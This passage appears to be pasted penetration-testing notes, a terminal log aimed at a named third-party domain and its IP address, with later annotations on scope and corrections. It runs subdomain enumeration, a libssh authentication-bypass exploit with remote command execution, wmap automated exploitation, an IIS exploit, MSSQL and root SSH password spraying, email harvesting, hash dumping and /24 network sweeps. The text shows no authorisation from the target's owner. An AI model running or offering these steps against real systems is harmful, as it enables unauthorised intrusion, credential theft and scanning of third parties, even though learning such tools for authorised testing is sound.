  3589. "response_time": "0.484440803528",
  3590. "http_response": {
  3591. "status": {
  3592. "reason": "Moved Permanently",
  3593. "code": 301
  3594. },
  3595. "http_headers": {
  3596. "date": "Wed, 22 Jan 2020 21:40:37 GMT",
  3597. "connection": "close",
  3598. "content-type": "text/html; charset=iso-8859-1",
  3599. "location": "http://www.etours.cn/",
  3600. "server": "Apache"
  3601. }
  3602. }
  3603. }
  3604.  
  3605.  
  3606.  
  3607. root@blackbox:/opt/knock# knockpy 184.154.192.250
  3608.  
  3609. _ __ _
  3610. | |/ / | | 4.1.1
  3611. | ' / _ __ ___ ___| | ___ __ _ _
  3612. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3613. | . \| | | | (_) | (__| <| |_) | |_| |
  3614. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3615. | | __/ |
  3616. |_| |___/
  3617.  
  3618. + checking for virustotal subdomains: NO
  3619. + checking for wildcard: NO
  3620. + checking for zonetransfer: NO
  3621. + resolving target: YES
  3622. - scanning for subdomain...
  3623.  
  3624. Ip Address Status Type Domain Name Server
  3625. ---------- ------ ---- ----------- ------
  3626.  
  3627.  
  3628. knockpy etours.cn
  3629.  
  3630. subdomain scan with external wordlist
  3631.  
  3632. root@blackbox:/opt/knock# locate subdomains.txt
  3633. /opt/SecLists/Discovery/DNS/shubs-subdomains.txt
  3634.  
  3635.  
  3636. root@blackbox:/opt/knock# knockpy etours.cn -w /opt/SecLists/Discovery/DNS/shubs-subdomains.txt   # path as returned by 'locate' above; /usr/share/seclists was not in the locate output
  3637.  
  3638. _ __ _
  3639. | |/ / | | 4.1.1
  3640. | ' / _ __ ___ ___| | ___ __ _ _
  3641. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3642. | . \| | | | (_) | (__| <| |_) | |_| |
  3643. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3644. | | __/ |
  3645. |_| |___/
  3646.  
  3647. + checking for virustotal subdomains: YES
  3648. [
  3649. "www.etours.cn",
  3650. "mail.etours.cn",
  3651. "beijing.etours.cn"
  3652. ]
  3653. + checking for wildcard: NO
  3654. + checking for zonetransfer: NO
  3655. + resolving target: YES
  3656. - scanning for subdomain...
  3657.  
  3658. Ip Address Status Type Domain Name Server
  3659. ---------- ------ ---- ----------- ------
  3660. 184.154.192.250 200 host beijing.etours.cn Apache
  3661. 184.154.192.250 200 host dns.etours.cn Apache
  3662. 184.154.192.250 200 host ftp.etours.cn Apache
  3663. 184.154.192.250 200 host mail.etours.cn Apache
  3664. 184.154.192.250 302 host webmail.etours.cn Apache
  3665. 184.154.192.250 200 host www.etours.cn Apache
  3666. (the original paste had the progress line overwriting these rows; they are the same six hosts the default-wordlist run found above, so the larger list added nothing, and all of them resolve to the single IP 184.154.192.250 -- one host serving several names, not separate infrastructure)
  3667.  
  3668. http://184.154.192.250:8880/login_up.php3
  3669. https://184.154.192.250:8443/login_up.php3
  3670. (login_up.php3 on 8443/8880 is the login path characteristic of the Plesk control panel -- confirm from the page title/branding before fingerprinting it as such; either way an administrative panel login reachable from the internet is worth reporting, and it must be inside the agreed scope before any credential testing is pointed at it)
  3671.  
  3672.  
  3673. root@blackbox:~# gobuster dir -u 184.154.192.250 -w /usr/share/seclists/Discovery/Web-Content/common.txt   # 'dir' mode brute-forces paths, so it needs a web-content list; the DNS subdomain list used for knockpy above is the wrong wordlist here
  3674.  
  3675.  
  3676. root@blackbox:~# systemctl status postgresql.service
  3677.  
  3678. USE METASPLOIT
  3679.  
  3680.  
  3681. root@blackbox:~# cd /opt/metasploit-framework/
  3682.  
  3683. root@blackbox:/opt/metasploit-framework# su postgres
  3684. postgres@blackbox:/opt/metasploit-framework$ createuser msf_user -P
  3685. Enter password for new role: msf
  3686. Enter it again: msf
  3687. postgres@blackbox:/opt/metasploit-framework$ createdb --owner=msf_user msf_database
  3688. postgres@blackbox:/opt/metasploit-framework$ msfconsole
  3689. NOTE: the role and database created here are never handed to msfconsole (no db_connect and no database.yml edit), and db_status below reports the default 'msf' database, so either run `db_connect msf_user:msf@127.0.0.1/msf_database` inside the console or initialise with `msfdb init`; also start msfconsole as your own user rather than as the postgres service account.
  3690.  
  3691.  
  3692. IIIIII dTb.dTb _.---._
  3693. II 4' v 'B .'"".'/|\`.""'.
  3694. II 6. .P : .' / | \ `. :
  3695. II 'T;. .;P' '.' / | \ `.'
  3696. II 'T; ;P' `. / | \ .'
  3697. IIIIII 'YvP' `-.__|__.-'
  3698.  
  3699. I love shells --egypt
  3700.  
  3701.  
  3702. =[ metasploit v5.0.72-dev- ]
  3703. + -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
  3704. + -- --=[ 562 payloads - 45 encoders - 10 nops ]
  3705. + -- --=[ 7 evasion ]
  3706.  
  3707.  
  3708. msf5 > db_status
  3709. [*] Connected to msf. Connection type: postgresql.
  3710.  
  3711.  
  3712. root@blackbox:~# msfconsole
  3713.  
  3714. Attempting authentication bypass on an unpatched libssh server (CVE-2018-10933). Precondition: the service on the chosen port must be a libssh-based server -- the bug is in libssh's server code, not OpenSSH -- so confirm the banner with auxiliary/scanner/ssh/ssh_version first; nothing earlier in this writeup shows what, if anything, listens on 830 on this host.
  3715.  
  3716. msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
  3717. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 184.154.192.250
  3718. rhosts => 184.154.192.250
  3719. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 830
  3720. rport => 830
  3721. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
  3722. spawn_pty => true
  3723. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
  3724. verbose => true
  3725. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
  3726.  
  3727. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -i 1
  3728. [*] Starting interaction with 1...
  3729.  
  3730. id
  3731.  
  3732. uname -a
  3733.  
  3734. tty
  3735.  
  3736.  
  3737. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
  3738. action => Execute
  3739. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
  3740. cmd => id; uname -a
  3741. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
  3742.  
  3743.  
  3744.  
  3745. USE WMAP
  3746.  
  3747. msf5 > load wmap
  3748.  
  3749. .-.-.-..-.-.-..---..---.
  3750. | | | || | | || | || |-'
  3751. `-----'`-'-'-'`-^-'`-'
  3752. [WMAP 1.5.1] === et [ ] metasploit.com 2012
  3753. [*] Successfully loaded plugin: wmap
  3754.  
  3755.  
  3756. Clean
  3757. msf5 > wmap_sites -l
  3758.  
  3759. msf5 > wmap_sites -d 0
  3760. msf5 > wmap_targets -c
  3761. msf5 > wmap_targets -l
  3762.  
  3763.  
  3764. ADD THE SITE
  3765.  
  3766. msf5 > wmap_sites -a http://www.etours.cn/
  3767. [*] Site created.
  3768. msf5 > wmap_sites -l
  3769. [*] Available sites
  3770. ===============
  3771.  
  3772. Id Host Vhost Port Proto # Pages # Forms
  3773. -- ---- ----- ---- ----- ------- -------
  3774. 0 184.154.192.250 184.154.192.250 80 http 0 0
  3775.  
  3776. ADD THE TARGET (note the Vhost column above shows the bare IP even though the site was added as http://www.etours.cn/; if the server uses name-based virtual hosts, requests sent with the IP in the Host header reach the default vhost rather than the WordPress site, so confirm the IP serves the same content -- or re-add the site so that Vhost is www.etours.cn -- before running wmap_run)
  3777.  
  3778. msf5 > wmap_targets -t 184.154.192.250
  3779. msf5 > wmap_targets -l
  3780. [*] Defined targets
  3781. ===============
  3782.  
  3783. Id Vhost Host Port SSL Path
  3784. -- ----- ---- ---- --- ----
  3785. 0 184.154.192.250 184.154.192.250 80 false /
  3786.  
  3787.  
  3788.  
  3789. RUN THE TEST
  3790.  
  3791. msf5 > wmap_run -t
  3792. [*] Testing target:
  3793. [*] Site: 184.154.192.250 (184.154.192.250)
  3794. [*] Port: 80 SSL: false
  3795. ============================================================
  3796. [*] Testing started. 2020-01-29 05:09:16 -0600
  3797. [*] Loading wmap modules...
  3798. [*] 39 wmap enabled modules loaded.
  3799. [*]
  3800. =[ SSL testing ]=
  3801. ============================================================
  3802. [*] Target is not SSL. SSL modules disabled.
  3803. [*]
  3804. =[ Web Server testing ]=
  3805. ============================================================
  3806. [*] Module auxiliary/scanner/http/http_version
  3807. [*] Module auxiliary/scanner/http/open_proxy
  3808. [*] Module auxiliary/admin/http/tomcat_administration
  3809. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
  3810. [*] Module auxiliary/scanner/http/drupal_views_user_enum
  3811. [*] Module auxiliary/scanner/http/frontpage_login
  3812. [*] Module auxiliary/scanner/http/host_header_injection
  3813. [*] Module auxiliary/scanner/http/options
  3814. [*] Module auxiliary/scanner/http/robots_txt
  3815. [*] Module auxiliary/scanner/http/scraper
  3816. [*] Module auxiliary/scanner/http/svn_scanner
  3817. [*] Module auxiliary/scanner/http/trace
  3818. [*] Module auxiliary/scanner/http/vhost_scanner
  3819. [*] Module auxiliary/scanner/http/webdav_internal_ip
  3820. [*] Module auxiliary/scanner/http/webdav_scanner
  3821. [*] Module auxiliary/scanner/http/webdav_website_content
  3822. [*]
  3823. =[ File/Dir testing ]=
  3824. ============================================================
  3825. [*] Module auxiliary/scanner/http/backup_file
  3826. [*] Module auxiliary/scanner/http/brute_dirs
  3827. [*] Module auxiliary/scanner/http/copy_of_file
  3828. [*] Module auxiliary/scanner/http/dir_listing
  3829. [*] Module auxiliary/scanner/http/dir_scanner
  3830. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
  3831. [*] Module auxiliary/scanner/http/file_same_name_dir
  3832. [*] Module auxiliary/scanner/http/files_dir
  3833. [*] Module auxiliary/scanner/http/http_put
  3834. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  3835. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
  3836. [*] Module auxiliary/scanner/http/replace_ext
  3837. [*] Module auxiliary/scanner/http/soap_xml
  3838. [*] Module auxiliary/scanner/http/trace_axd
  3839. [*] Module auxiliary/scanner/http/verb_auth_bypass
  3840. [*]
  3841. =[ Unique Query testing ]=
  3842. ============================================================
  3843. [*] Module auxiliary/scanner/http/blind_sql_query
  3844. [*] Module auxiliary/scanner/http/error_sql_injection
  3845. [*] Module auxiliary/scanner/http/http_traversal
  3846. [*] Module auxiliary/scanner/http/rails_mass_assignment
  3847. [*] Module exploit/multi/http/lcms_php_exec
  3848. [*]
  3849. =[ Query testing ]=
  3850. ============================================================
  3851. [*]
  3852. =[ General testing ]=
  3853. ============================================================
  3854. [*] Done.
  3855.  
  3856.  
  3857.  
  3858. RUN THE EXPLOIT
  3859.  
  3860. msf5 > wmap_run -e
  3861.  
  3862.  
  3863.  
  3864. CHECK THE VULNERABILITIES
  3865.  
  3866. msf5 > wmap_vulns -l
  3867.  
  3868.  
  3869. EXECUTE VULNERABILITIES
  3870.  
  3871. msf > vulns
  3872.  
  3873.  
  3874. RUN DB_NMAP THROUGH METASPLOIT
  3875.  
  3876. msf5 > db_nmap -Pn -sV 184.154.192.250
  3877. (-sV is what fills the services 'info' column that the listings below filter on; without version detection nmap only records port state and the table-based service name, and 'info' stays empty)
  3878.  
  3879. msf5 > hosts
  3880.  
  3881.  
  3882. msf5 > hosts -c address,os_flavor
  3883.  
  3884.  
  3885. msf5 > hosts -c address,os_flavor -S Windows
  3886.  
  3887. msf5 > hosts -c address,os_flavor -S Windows -R
  3888.  
  3889. RHOSTS => 184.154.192.250
  3890.  
  3891. msf5 > services -h
  3892.  
  3893. msf5 > services -c name,info 184.154.192.250
  3894.  
  3895. msf5 > services -c name,info -S http
  3896.  
  3897.  
  3898. msf5 > services -c info,name -p 445
  3899.  
  3900. msf5 > services -c port,proto,state -p 70-81
  3901.  
  3902.  
  3903. msf5 > services -s http -c port 184.154.192.250
  3904.  
  3905. msf5 > search IIS
  3906. (every HTTP response from this host above identifies the server as Apache, and the hosts/services queries just run are where an IIS or Windows box would have shown up; exploit/windows/iis/msadc targets the MDAC RDS component of IIS 4/5 and has no target here -- choose exploits from what `services` actually reports instead of searching blindly)
  3907. msf5 > use exploit/windows/iis/msadc
  3908.  
  3909. msf5 exploit(windows/iis/msadc) > run
  3910.  
  3911. msf5 > search mssql_login
  3912.  
  3913. Matching Modules
  3914. ================
  3915.  
  3916. # Name Disclosure Date Rank Check Description
  3917. - ---- --------------- ---- ----- -----------
  3918. 0 auxiliary/scanner/mssql/mssql_login normal No MSSQL Login Utility
  3919.  
  3920. msf5 > use auxiliary/scanner/mssql/mssql_login
  3921.  
  3922. msf5 auxiliary(scanner/mssql/mssql_login) > show options
  3923.  
  3924. msf5 auxiliary(scanner/mssql/mssql_login) > set USERNAME sa
  3925. msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /opt/commix/src/txt/passwords_john.txt
  3926. msf5 auxiliary(scanner/mssql/mssql_login) > run
  3927. (nothing in the recon above shows MSSQL on this host, which is consistent with the empty creds table that follows; check `services -p 1433` before spraying, and when there is a target set STOP_ON_SUCCESS true so the run stops at the first valid password instead of hammering the account)
  3928.  
  3929. msf5 auxiliary(scanner/mssql/mssql_login) > creds
  3930. Credentials
  3931. ===========
  3932.  
  3933. host origin service public private realm private_type JtR Format
  3934. ---- ------ ------- ------ ------- ----- ------------ ----------
  3935.  
  3936. msf5 auxiliary(scanner/mssql/mssql_login) > back
  3937. msf5 > loot -h
  3938. Usage: loot [options]
  3939. Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
  3940. Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]
  3941. Del: loot -d [addr1 addr2 ...]
  3942.  
  3943. -a,--add Add loot to the list of addresses, instead of listing
  3944. -d,--delete Delete *all* loot matching host and type
  3945. -f,--file File with contents of the loot to add
  3946. -i,--info Info of the loot to add
  3947. -t <type1,type2> Search for a list of types
  3948. -h,--help Show this help information
  3949. -S,--search Search string to filter by
  3950.  
  3951.  
  3952.  
  3953. Here’s an example of how one would populate the database with some ‘loot’.
  3954.  
  3955. msf exploit(usermap_script) > exploit
  3956.  
  3957. msf exploit(usermap_script) > use post/linux/gather/hashdump
  3958.  
  3959. msf post(hashdump) > show options
  3960.  
  3961. msf post(hashdump) > sessions -l
  3962.  
  3963. msf post(hashdump) > run
  3964.  
  3965.  
  3966. USE LOOT
  3967.  
  3968. msf post(hashdump) > loot
  3969.  
  3970. RELOAD ALL METASPLOIT MODULES
  3971.  
  3972. msf > reload_all
  3973.  
  3974. USE ARP_SWEEP (ARP only works on the local layer-2 segment, so this is for an internal network you are plugged into -- it cannot reach an internet host such as the target above)
  3975.  
  3976. msf > use auxiliary/scanner/discovery/arp_sweep
  3977.  
  3978. msf auxiliary(arp_sweep) > show options
  3979.  
  3980. msf auxiliary(arp_sweep) > set RHOSTS TARGET/24
  3981.  
  3982. RHOSTS => TARGET/24
  3983.  
  3984. msf auxiliary(arp_sweep) > set THREADS 50
  3985.  
  3986. THREADS => 50
  3987.  
  3988. msf auxiliary(arp_sweep) > run
  3989.  
  3990. USE NMAP (plain `nmap` at the msf prompt just shells out and stores nothing; use db_nmap when results should land in the workspace -- and note that TARGET/24 around a hosted IP such as 184.154.192.250 covers the provider's other customers, which is outside scope unless the whole /24 was explicitly authorised)
  3991.  
  3992. msf > nmap -sn TARGET/24
  3993.  
  3994. msf > nmap -PU -sn TARGET/24
  3995.  
  3996. msf > nmap -O TARGET
  3997.  
  3998. SEARCH PORTSCAN
  3999.  
  4000. msf > search portscan
  4001.  
  4002. USE PORTSCAN
  4003.  
  4004. msf > use auxiliary/scanner/portscan/syn
  4005.  
  4006. msf auxiliary(syn) > set RHOSTS TARGET
  4007.  
  4008. RHOSTS => TARGET
  4009.  
  4010. msf auxiliary(syn) > set THREADS 200
  4011.  
  4012. THREADS => 200
  4013.  
  4014. msf auxiliary(syn) > run
  4015.  
  4016. SEARCH NAME_VERSION
  4017.  
  4018. msf > search name:_version
  4019.  
  4020. USE TELNET AUXILIARY SCANNER
  4021.  
  4022. msf > use auxiliary/scanner/telnet/telnet_version
  4023.  
  4024. msf auxiliary(telnet_version) > set RHOSTS TARGET/24
  4025.  
  4026. RHOSTS => TARGET/24
  4027.  
  4028. msf auxiliary(telnet_version) > set THREADS 100
  4029.  
  4030. THREADS => 100
  4031.  
  4032. msf auxiliary(telnet_version) > run
  4033.  
  4034. USE AUXILIARY SSH_VERSION
  4035.  
  4036. msf > use auxiliary/scanner/ssh/ssh_version
  4037.  
  4038. msf auxiliary(ssh_version) > show options
  4039.  
  4040. Module options (auxiliary/scanner/ssh/ssh_version):
  4041.  
  4042. Name Current Setting Required Description
  4043.  
  4044. ---- --------------- -------- -----------
  4045.  
  4046. RHOSTS yes The target address range or CIDR identifier
  4047.  
  4048. RPORT 22 yes The target port
  4049.  
  4050. THREADS 1 yes The number of concurrent threads
  4051.  
  4052. TIMEOUT 30 yes Timeout for the SSH probe
  4053.  
  4054. msf auxiliary(ssh_version) > set RHOSTS TARGET/24
  4055.  
  4056. RHOSTS => TARGET/24
  4057.  
  4058. msf auxiliary(ssh_version) > set THREADS 200
  4059.  
  4060. THREADS => 200
  4061.  
  4062. msf auxiliary(ssh_version) > run
  4063.  
  4064. USE ORACLE SCANNER
  4065.  
  4066. msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
  4067.  
  4068. msf auxiliary(tnslsnr_version) > show options
  4069.  
  4070. Module options (auxiliary/scanner/oracle/tnslsnr_version):
  4071.  
  4072. Name Current Setting Required Description
  4073.  
  4074. ---- --------------- -------- -----------
  4075.  
  4076. RHOSTS yes The target address range or CIDR identifier
  4077.  
  4078. RPORT 1521 yes The target port
  4079.  
  4080. THREADS 1 yes The number of concurrent threads
  4081.  
  4082. msf auxiliary(tnslsnr_version) > set RHOSTS TARGET/24
  4083.  
  4084. RHOSTS => TARGET/24
  4085.  
  4086. msf auxiliary(tnslsnr_version) > set THREADS 200
  4087.  
  4088. THREADS => 200
  4089.  
  4090. msf auxiliary(tnslsnr_version) > run
  4091.  
  4092. USE OPEN_PROXY
  4093.  
  4094. msf auxiliary(open_proxy) > show options
  4095.  
  4096. Module options (auxiliary/scanner/http/open_proxy):
  4097.  
  4098. Name Current Setting Required Description
  4099.  
  4100. ---- --------------- -------- -----------
  4101.  
  4102. LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via RIPE.net
  4103.  
  4104. MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
  4105.  
  4106. RANDOMIZE_PORTS false no Randomize the order the ports are probed
  4107.  
  4108. RHOSTS 24.25.24.1-xx.xx.xx.xx.xx yes The target address range or CIDR identifier   <- placeholder left over from a generic example; set this to the authorised range only, as open-proxy probing across an arbitrary public block is unauthorised scanning of third parties
  4109.  
  4110. RPORT 8080 yes The target port
  4111.  
  4112. SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
  4113.  
  4114. THREADS 200 yes The number of concurrent threads
  4115.  
  4116. UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
  4117.  
  4118. VERIFY_CONNECT true no Enable test for CONNECT method
  4119.  
  4120. VERIFY_HEAD false no Enable test for HEAD method
  4121.  
  4122. ValidCode 200,302 no Valid HTTP code for a successfully request
  4123.  
  4124. ValidPattern server: gws
  4125.  
  4126. USE SSH_LOGIN
  4127.  
  4128. msf > use auxiliary/scanner/ssh/ssh_login
  4129.  
  4130. msf auxiliary(ssh_login) > set RHOSTS TARGET
  4131.  
  4132. RHOSTS => TARGET
  4133.  
  4134. msf auxiliary(ssh_login) > set USERNAME root
  4135.  
  4136. USERNAME => root
  4137.  
  4138. msf auxiliary(ssh_login) > set PASS_FILE /root/password.txt
  4139.  
  4140. PASS_FILE => /root/password.txt
  4141.  
  4142. msf auxiliary(ssh_login) > set THREADS 5
  4143.  
  4144. THREADS => 5   (the original used 2000, which is counter-productive against a single sshd: its MaxStartups throttle randomly drops connections once more than a handful of unauthenticated sessions are open, and the burst trips fail2ban-style lockouts; also set STOP_ON_SUCCESS true so the spray stops at the first valid credential)
  4145.  
  4146. msf auxiliary(ssh_login) > run
  4147.  
  4148. USE AUXILIARY DIR_SCANNER
  4149.  
  4150. msf > use auxiliary/scanner/http/dir_scanner
  4151.  
  4152. msf auxiliary(dir_scanner) > set THREADS 50
  4153.  
  4154. THREADS => 50
  4155.  
  4156. msf auxiliary(dir_scanner) > set RHOSTS TARGET
  4157.  
  4158. RHOSTS => TARGET
  4159.  
  4160. msf auxiliary(dir_scanner) > exploit
  4161.  
  4162. USE EMAIL_COLLECTOR
  4163.  
  4164. msf > use auxiliary/gather/search_email_collector
  4165.  
  4166. msf auxiliary(search_email_collector) > set DOMAIN TARGET
  4167.  
  4168. DOMAIN => TARGET
  4169.  
  4170. msf auxiliary(search_email_collector) > run
  4171.  
  4172. USE AUXILIARY SCANNER HTTP CRAWLER
  4173.  
  4174. msf > use auxiliary/scanner/http/crawler
  4175.  
  4176. msf auxiliary(crawler) > set RHOST TARGET
  4177.  
  4178. RHOST => TARGET
  4179.  
  4180. msf auxiliary(crawler) > run
  4181.  
  4182. [*] Crawling http://TARGET:80/...
  4183.  
  4184. [*] Crawl of http://TARGET:80/ complete
  4185.  
  4186. [*] Auxiliary module execution completed
  4187.  
  4188.  
  4189. openvasad -c add_user -u admin -r Admin
  4190.  
  4191. openvasmd --user=admin --new-password=admin   (admin/admin is a throwaway lab credential and it also lands in shell history; whoever can reach the manager port used below gets full scan and report access, so use a real password and keep that port bound to localhost)
  4192.  
  4193. openvas_target_create "windows" TARGET "new_scan"   (this is an msf plugin command, so it belongs after `load openvas` / `openvas_connect` below; the original used curly quotes, which the console does not treat as quoting -- which is why the target listing further down shows the name with quote characters attached)
  4194.  
  4195. msf > load openvas
  4196.  
  4197. [*] Welcome to OpenVAS integration by kost and averagesecurityguy.
  4198.  
  4199. [*]
  4200.  
  4201. [*] OpenVAS integration requires a database connection. Once the
  4202.  
  4203. [*] database is ready, connect to the OpenVAS server using openvas_connect.
  4204.  
  4205. [*] For additional commands use openvas_help.
  4206.  
  4207. [*]
  4208.  
  4209. [*] Successfully loaded plugin: OpenVAS
  4210.  
  4211. msf > openvas_connect admin admin localhost 9390 ok
  4212.  
  4213. msf > openvas_help
  4214.  
  4215. [*] openvas_help Display this help
  4216.  
  4217. [*] openvas_debug Enable/Disable debugging
  4218.  
  4219. [*] openvas_version Display the version of the OpenVAS server
  4220.  
  4221. [*]
  4222.  
  4223. [*] CONNECTION
  4224.  
  4225. [*] ==========
  4226.  
  4227. [*] openvas_connect Connects to OpenVAS
  4228.  
  4229. [*] openvas_disconnect Disconnects from OpenVAS
  4230.  
  4231. [*]
  4232.  
  4233. [*] TARGETS
  4234.  
  4235. [*] =======
  4236.  
  4237. [*] openvas_target_create Create target
  4238.  
  4239. [*] openvas_target_delete Deletes target specified by ID
  4240.  
  4241. [*] openvas_target_list Lists targets
  4242.  
  4243. [*]
  4244.  
  4245. [*] TASKS
  4246.  
  4247. [*] =====
  4248.  
  4249. [*] openvas_task_create Create task
  4250.  
  4251. [*] openvas_task_delete Delete a task and all associated reports
  4252.  
  4253. [*] openvas_task_list Lists tasks
  4254.  
  4255. [*] openvas_task_start Starts task specified by ID
  4256.  
  4257. [*] openvas_task_stop Stops task specified by ID
  4258.  
  4259. [*] openvas_task_pause Pauses task specified by ID
  4260.  
  4261. [*] openvas_task_resume Resumes task specified by ID
  4262.  
  4263. [*] openvas_task_resume_or_start Resumes or starts task specified by ID
  4264.  
  4265. [*]
  4266.  
  4267. [*] CONFIGS
  4268.  
  4269. [*] =======
  4270.  
  4271. [*] openvas_config_list Lists scan configurations
  4272.  
  4273. [*]
  4274.  
  4275. [*] FORMATS
  4276.  
  4277. [*] =======
  4278.  
  4279. [*] openvas_format_list Lists available report formats
  4280.  
  4281. [*]
  4282.  
  4283. [*] REPORTS
  4284.  
  4285. [*] =======
  4286.  
  4287. [*] openvas_report_list Lists available reports
  4288.  
  4289. [*] openvas_report_delete Delete a report specified by ID
  4290.  
  4291. [*] openvas_report_import Imports an OpenVAS report specified by ID
  4292.  
  4293. [*] openvas_report_download Downloads an OpenVAS report specified by ID
  4294.  
  4295. msf > openvas_config_list
  4296.  
  4297. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4298.  
  4299. [+] OpenVAS list of configs
  4300.  
  4301. ID Name
  4302.  
  4303. -- ----
  4304.  
  4305. 085569ce-73ed-11df-83c3-002264764cea empty
  4306.  
  4307. 2d3f051c-55ba-11e3-bf43-406186ea4fc5 Host Discovery
  4308.  
  4309. 698f691e-7489-11df-9d8c-002264764cea Full and fast ultimate
  4310.  
  4311. 708f25c4-7489-11df-8094-002264764cea Full and very deep
  4312.  
  4313. 74db13d6-7489-11df-91b9-002264764cea Full and very deep ultimate
  4314.  
  4315. 8715c877-47a0-438d-98a3-27c7a6ab2196 Discovery
  4316.  
  4317. bbca7412-a950-11e3-9109-406186ea4fc5 System Discovery
  4318.  
  4319. daba56c8-73ec-11df-a475-002264764cea Full and fast
  4320.  
  4321. msf > openvas_target_list
  4322.  
  4323. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4324.  
  4325. [+] OpenVAS list of targets
  4326.  
  4327. ID Name Hosts Max Hosts In Use Comment
  4328.  
  4329. -- ---- ----- --------- ------ -------
  4330.  
  4331. 785ca141-93b1-4325-9117-040dbcd8297f "windows" TARGET 1 0 "new_scan"
  4332.  
  4333. b493b7a8-7489-11df-a3ec-002264764cea Localhost localhost 1 0
  4334.  
  4335.  
  4336. msf > openvas_task_create
  4337.  
  4338. [*] Usage: openvas_task_create <name> <comment> <config_id> <target_id>
  4339.  
  4340. msf > openvas_task_create "win" "test" 2d3f051c-55ba-11e3-bf43-406186ea4fc5 785ca141-93b1-4325-9117-040dbcd8297f
  4341.  
  4342. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4343.  
  4344. [*] f93de23e-ed04-4db9-9321-0e40d3c11d46
  4345.  
  4346. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4347.  
  4348. [+] OpenVAS list of tasks
  4349.  
  4350. ID Name Comment Status Progress
  4351.  
  4352. -- ---- ------- ------ --------
  4353.  
  4354. f93de23e-ed04-4db9-9321-0e40d3c11d46 win test New -1
  4355.  
  4356. msf > openvas_task_start f93de23e-ed04-4db9-9321-0e40d3c11d46
  4357.  
  4358. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4359.  
  4360. [*] <X><authenticate_response status='200' status_text='OK'><role>Admin</role><timezone>UTC</timezone><severity>nist</severity></authenticate_response><start_task_response status='202' status_text='OK, request submitted'><report_id>68e8a43f-8f06-4bc4-92a3-1fec76ea246b</report_id></start_task_response></X>
  4361.  
  4362.  
  4363. msf > openvas_task_list
  4364.  
  4365. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4366.  
  4367. [+] OpenVAS list of tasks
  4368.  
  4369. ID Name Comment Status Progress
  4370.  
  4371. -- ---- ------- ------ --------
  4372.  
  4373. f93de23e-ed04-4db9-9321-0e40d3c11d46 win test Done -1
  4374.  
  4375. msf >
  4376.  
  4377. openvas_report_list
  4378.  
  4379. openvas_format_list
  4380.  
  4381. openvas_report_download 1 5 /root/Desktop report
  4382.  
  4383.  
  4384. CHECK THE SITE WITH SKIPFISH
  4385.  
  4386. root@blackbox:~# locate skipfish | grep bin
  4387. /usr/bin/skipfish
  4388. root@blackbox:~# locate dictionaries
  4389.  
  4390.  
  4391. root@blackbox:~# skipfish -S /usr/share/skipfish/dictionaries/complete.wl -o /tmp/scan http://etours.cn
  4392.  
  4393. EXAMPLES
  4394.  
  4395. Scan type: config
  4396.  
  4397. skipfish --config config/example.conf http://example.com
  4398.  
  4399. Scan type: quick
  4400.  
  4401. skipfish -o output/dir/ http://example.com
  4402.  
  4403. Scan type: extensive bruteforce
  4404.  
  4405. skipfish [...other options..] -S dictionaries/complete.wl http://example.com
  4406.  
  4407.  
  4408.  
  4409. Scan type: without bruteforcing
  4410.  
  4411. skipfish [...other options..] -LY http://example.com
  4412.  
  4413. Scan type: authenticated (basic)
  4414.  
  4415. skipfish [...other options..] -A username:password http://example.com
  4416.  
  4417. Scan type: authenticated (cookie)
  4418.  
  4419. skipfish [...other options..] -C jsession=myauthcookiehere -X /logout http://example.com
  4420.  
  4421.  
  4422.  
  4423. Scan type: flaky server
  4424.  
  4425. skipfish [...other options..] -l 5 -g 2 -t 30 -i 15 http://example.com
  4426.  
  4427. OPEN SKIPFISH RESULTS WITH FIREFOX
  4428.  
  4429. In terminal:
  4430.  
  4431. Report
  4432.  
  4433. ------
  4434.  
  4435. A report has been generated in the file /tmp/scan_report
  4436.  
